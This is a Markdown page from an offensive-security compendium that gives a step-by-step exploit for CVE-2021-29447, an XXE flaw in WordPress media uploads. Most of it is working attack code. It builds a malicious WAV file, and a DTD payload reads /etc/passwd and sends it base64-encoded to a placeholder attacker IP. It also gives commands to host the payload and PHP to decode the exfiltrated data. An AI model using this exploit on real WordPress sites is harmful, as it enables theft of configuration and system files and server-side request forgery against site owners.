killchain-compendium/Exploits/Web/XXE Wordpress.md

31 lines
923 B
Markdown
Raw Normal View History

2022-11-13 22:38:01 +01:00
# CVE-2021-29447
* Upload of wav file has following consequences
* **Arbitrary File Disclosure** for example `wp-config.php`
* **Server Side Request Forgery**
## Usage
* Create `wav` Payload
```sh
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```
* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
```sh
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
```
* Launch http server
```sh
php -S 0.0.0.0:8000
python -m http.server
```
* Copy returned base64 into `php` file
```php
<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?>
```